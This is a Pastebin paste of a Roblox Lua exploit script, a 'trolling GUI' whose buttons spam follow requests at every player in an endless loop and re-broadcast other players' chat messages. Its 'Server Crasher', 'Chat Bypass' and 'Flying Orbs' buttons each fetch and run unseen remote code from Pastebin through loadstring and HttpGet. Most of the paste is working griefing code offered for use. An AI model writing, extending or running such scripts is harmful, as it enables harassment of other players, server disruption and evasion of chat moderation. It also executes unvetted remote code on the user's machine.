Advertisement
BlastingStone

Untitled

Jan 12th, 2020
288
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 10.45 KB | None | 0 0
  1. --[[
  2.     ____  __           __  _             _____ __                
  3.    / __ )/ /___ ______/ /_(_)___  ____ _/ ___// /_____  ____  ___
  4.   / __  / / __ `/ ___/ __/ / __ \/ __ `/\__ \/ __/ __ \/ __ \/ _ \
  5.  / /_/ / / /_/ (__  ) /_/ / / / / /_/ /___/ / /_/ /_/ / / / /  __/
  6. /_____/_/\__,_/____/\__/_/_/ /_/\__, //____/\__/\____/_/ /_/\___/
  7.                                /____/ Made by BlastingStone#8878
  8. ]]--
  9.  
  10. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Made by BlastingStone.\n My 1st trolling GUI. Made for testing my scripting skills.",Duration=20,Button1="Alright."})
  11.  
  12. local ScreenGui = Instance.new("ScreenGui")
  13. local Frame = Instance.new("Frame")
  14. local NameOfScript = Instance.new("TextLabel")
  15. local ImageLabel = Instance.new("ImageLabel")
  16. local Version = Instance.new("TextLabel")
  17. local FollowAll = Instance.new("TextButton")
  18. local R6Thingy = Instance.new("TextButton")
  19. local Note = Instance.new("TextLabel")
  20. local FlyingOrbs = Instance.new("TextButton")
  21. local ChatTroll = Instance.new("TextButton")
  22. local ServerCrasher = Instance.new("TextButton")
  23. local ChatByp = Instance.new("TextButton")
  24.  
  25. --Properties:
  26.  
  27. ScreenGui.Parent = game.CoreGui
  28. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  29.  
  30. Frame.Active = true
  31. Frame.Draggable = true
  32. Frame.Parent = ScreenGui
  33. Frame.BackgroundColor3 = Color3.new(0.509804, 0.509804, 0.509804)
  34. Frame.BorderColor3 = Color3.new(0, 0, 0)
  35. Frame.BorderSizePixel = 3
  36. Frame.Position = UDim2.new(0.101851851, 0, 0.210826248, 0)
  37. Frame.Size = UDim2.new(0, 479, 0, 411)
  38.  
  39. NameOfScript.Name = "NameOfScript"
  40. NameOfScript.Parent = Frame
  41. NameOfScript.BackgroundColor3 = Color3.new(1, 1, 1)
  42. NameOfScript.BackgroundTransparency = 1
  43. NameOfScript.Position = UDim2.new(0.0195221007, 0, 0.0272019468, 0)
  44. NameOfScript.Size = UDim2.new(0, 200, 0, 50)
  45. NameOfScript.Font = Enum.Font.Arcade
  46. NameOfScript.Text = "some dumb trolling gui"
  47. NameOfScript.TextColor3 = Color3.new(0, 0, 0)
  48. NameOfScript.TextScaled = true
  49. NameOfScript.TextSize = 14
  50. NameOfScript.TextWrapped = true
  51.  
  52. ImageLabel.Parent = Frame
  53. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  54. ImageLabel.BackgroundTransparency = 1
  55. ImageLabel.Position = UDim2.new(0.774579465, 0, 0, 0)
  56. ImageLabel.Size = UDim2.new(0, 107, 0, 110)
  57. ImageLabel.Image = "http://www.roblox.com/asset/?id=4492172626"
  58.  
  59. Version.Name = "Version"
  60. Version.Parent = Frame
  61. Version.BackgroundColor3 = Color3.new(1, 1, 1)
  62. Version.BackgroundTransparency = 1
  63. Version.Position = UDim2.new(0.154555887, 0, 0.148400247, 0)
  64. Version.Size = UDim2.new(0, 136, 0, 16)
  65. Version.Font = Enum.Font.Code
  66. Version.Text = "v0.6 / BlastingStone#8878"
  67. Version.TextColor3 = Color3.new(0, 0, 0)
  68. Version.TextSize = 14
  69.  
  70. FollowAll.Name = "FollowAll"
  71. FollowAll.Parent = Frame
  72. FollowAll.BackgroundColor3 = Color3.new(1, 1, 1)
  73. FollowAll.BorderSizePixel = 3
  74. FollowAll.Position = UDim2.new(0.0551004671, 0, 0.252499998, 0)
  75. FollowAll.Size = UDim2.new(0, 125, 0, 35)
  76. FollowAll.Font = Enum.Font.Cartoon
  77. FollowAll.Text = "Follow All"
  78. FollowAll.TextColor3 = Color3.new(0, 0, 0)
  79. FollowAll.TextSize = 14
  80.  
  81. R6Thingy.Name = "R6Thingy"
  82. R6Thingy.Parent = Frame
  83. R6Thingy.BackgroundColor3 = Color3.new(1, 1, 1)
  84. R6Thingy.BorderSizePixel = 3
  85. R6Thingy.Position = UDim2.new(0.0551004671, 0, 0.425833315, 0)
  86. R6Thingy.Size = UDim2.new(0, 125, 0, 35)
  87. R6Thingy.Font = Enum.Font.Cartoon
  88. R6Thingy.Text = "Check it out yourself."
  89. R6Thingy.TextColor3 = Color3.new(0, 0, 0)
  90. R6Thingy.TextSize = 14
  91.  
  92. Note.Name = "Note"
  93. Note.Parent = Frame
  94. Note.BackgroundColor3 = Color3.new(1, 1, 1)
  95. Note.BackgroundTransparency = 1
  96. Note.Position = UDim2.new(0.290444702, 0, 0.876368582, 0)
  97. Note.Size = UDim2.new(0, 200, 0, 50)
  98. Note.Font = Enum.Font.Code
  99. Note.Text = "I'm sorry for this script."
  100. Note.TextColor3 = Color3.new(0, 0, 0)
  101. Note.TextSize = 14
  102.  
  103. FlyingOrbs.Name = "FlyingOrbs"
  104. FlyingOrbs.Parent = Frame
  105. FlyingOrbs.BackgroundColor3 = Color3.new(1, 1, 1)
  106. FlyingOrbs.BorderSizePixel = 3
  107. FlyingOrbs.Position = UDim2.new(0.0551004671, 0, 0.602916658, 0)
  108. FlyingOrbs.Size = UDim2.new(0, 125, 0, 35)
  109. FlyingOrbs.Font = Enum.Font.Cartoon
  110. FlyingOrbs.Text = "R6 Flying Orbs"
  111. FlyingOrbs.TextColor3 = Color3.new(0, 0, 0)
  112. FlyingOrbs.TextSize = 14
  113.  
  114. ChatTroll.Name = "ChatTroll"
  115. ChatTroll.Parent = Frame
  116. ChatTroll.BackgroundColor3 = Color3.new(1, 1, 1)
  117. ChatTroll.BorderSizePixel = 3
  118. ChatTroll.Position = UDim2.new(0.406053632, 0, 0.252499998, 0)
  119. ChatTroll.Size = UDim2.new(0, 125, 0, 35)
  120. ChatTroll.Font = Enum.Font.Cartoon
  121. ChatTroll.Text = "Chat Troll"
  122. ChatTroll.TextColor3 = Color3.new(0, 0, 0)
  123. ChatTroll.TextSize = 14
  124.  
  125. ServerCrasher.Name = "ServerCrasher"
  126. ServerCrasher.Parent = Frame
  127. ServerCrasher.BackgroundColor3 = Color3.new(1, 1, 1)
  128. ServerCrasher.BorderSizePixel = 3
  129. ServerCrasher.Position = UDim2.new(0.40728271, 0, 0.425833315, 0)
  130. ServerCrasher.Size = UDim2.new(0, 125, 0, 35)
  131. ServerCrasher.Font = Enum.Font.Cartoon
  132. ServerCrasher.Text = "Server Crasher"
  133. ServerCrasher.TextColor3 = Color3.new(0, 0, 0)
  134. ServerCrasher.TextSize = 14
  135.  
  136. ChatByp.Name = "ChatByp"
  137. ChatByp.Parent = Frame
  138. ChatByp.BackgroundColor3 = Color3.new(1, 1, 1)
  139. ChatByp.BorderSizePixel = 3
  140. ChatByp.Position = UDim2.new(0.40728271, 0, 0.602916658, 0)
  141. ChatByp.Size = UDim2.new(0, 125, 0, 35)
  142. ChatByp.Font = Enum.Font.Cartoon
  143. ChatByp.Text = "Chat Bypass"
  144. ChatByp.TextColor3 = Color3.new(0, 0, 0)
  145. ChatByp.TextSize = 14
  146.  
  147. -- Scripts:
  148.  
  149. local function HHCSBG_fake_script() -- NameOfScript.LocalScript
  150.     local script = Instance.new('LocalScript', NameOfScript)
  151.  
  152.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  153.    
  154.     counter = 0
  155.    
  156.     while wait(0.1)do
  157.      script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)
  158.      
  159.      counter = counter + 0.01
  160.     end
  161. end
  162. coroutine.wrap(HHCSBG_fake_script)()
  163. local function JMAHEKS_fake_script() -- FollowAll.LocalScript
  164.     local script = Instance.new('LocalScript', FollowAll)
  165.  
  166.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  167.    
  168.     counter = 0
  169.    
  170.     while wait(0.1)do
  171.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  172.      
  173.      counter = counter + 0.01
  174.     end
  175. end
  176. coroutine.wrap(JMAHEKS_fake_script)()
  177. FollowAll.MouseButton1Click:connect(function() -- FollowAll.LocalScript
  178.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  179.     local RobloxReplicatedStorage = game:GetService('RobloxReplicatedStorage')
  180.     local RemoteEvent_NewFollower = RobloxReplicatedStorage:WaitForChild('NewFollower')
  181.     while wait(0) do
  182.     for i,v in pairs(game.Players:GetChildren()) do
  183.     RemoteEvent_NewFollower:FireServer(v, true)
  184.     end
  185.     end
  186. end)
  187. local function JUKPOE_fake_script() -- R6Thingy.LocalScript
  188.     local script = Instance.new('LocalScript', R6Thingy)
  189.  
  190.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  191.    
  192.     counter = 0
  193.    
  194.     while wait(0.1)do
  195.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  196.      
  197.      counter = counter + 0.01
  198.     end
  199. end
  200. coroutine.wrap(JUKPOE_fake_script)()
  201. R6Thingy.MouseButton1Click:connect(function() -- R6Thingy.LocalScript
  202.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  203.     loadstring(game:HttpGet(('https://pastebin.com/raw/VBNjM0nh'),true))()
  204. end)
  205. local function NMKJ_fake_script() -- Frame.LocalScript
  206.     local script = Instance.new('LocalScript', Frame)
  207.  
  208.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  209.    
  210.     counter = 0
  211.    
  212.     while wait(0.1)do
  213.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  214.      
  215.      counter = counter + 0.01
  216.     end
  217. end
  218. coroutine.wrap(NMKJ_fake_script)()
  219. local function MMWWVOJ_fake_script() -- FlyingOrbs.LocalScript
  220.     local script = Instance.new('LocalScript', FlyingOrbs)
  221.  
  222.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  223.    
  224.     counter = 0
  225.    
  226.     while wait(0.1)do
  227.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  228.      
  229.      counter = counter + 0.01
  230.     end
  231. end
  232. coroutine.wrap(MMWWVOJ_fake_script)()
  233. FlyingOrbs.MouseButton1Click:connect(function() -- FlyingOrbs.LocalScript
  234.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  235.     loadstring(game:HttpGet(('https://pastebin.com/raw/UrxVQURH'),true))()
  236. end)
  237. local function DYIR_fake_script() -- ChatTroll.LocalScript
  238.     local script = Instance.new('LocalScript', ChatTroll)
  239.  
  240.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  241.    
  242.     counter = 0
  243.    
  244.     while wait(0.1)do
  245.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  246.      
  247.      counter = counter + 0.01
  248.     end
  249. end
  250. coroutine.wrap(DYIR_fake_script)()
  251. ChatTroll.MouseButton1Click:connect(function() -- ChatTroll.LocalScript
  252.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  253.     local Action = game.Players:GetPlayers()
  254.      for i = 1,#Action do
  255.     Action[i].Chatted:connect(function(Message)
  256.      game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("".."["..Action[i].Name.."]".." "..Message, "All")
  257.      end)
  258.     end
  259.     end)
  260. local function BHUIE_fake_script() -- ServerCrasher.LocalScript
  261.     local script = Instance.new('LocalScript', ServerCrasher)
  262.  
  263.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  264.    
  265.     counter = 0
  266.    
  267.     while wait(0.1)do
  268.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  269.      
  270.      counter = counter + 0.01
  271.     end
  272. end
  273. coroutine.wrap(BHUIE_fake_script)()
  274. ServerCrasher.MouseButton1Click:connect(function() -- ServerCrasher.LocalScript
  275.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  276.     loadstring(game:HttpGet(('https://pastebin.com/raw/VSeqmt5t'),true))()
  277. end)
  278. local function YLMFF_fake_script() -- ChatByp.LocalScript
  279.     local script = Instance.new('LocalScript', ChatByp)
  280.  
  281.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  282.    
  283.     counter = 0
  284.    
  285.     while wait(0.1)do
  286.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  287.      
  288.      counter = counter + 0.01
  289.     end
  290. end
  291. coroutine.wrap(YLMFF_fake_script)()
  292. ChatByp.MouseButton1Click:connect(function() -- ChatByp.LocalScript
  293.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  294.     loadstring(game:HttpGet(('https://pastebin.com/raw/Wh0DUEdn'),true))()
  295. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement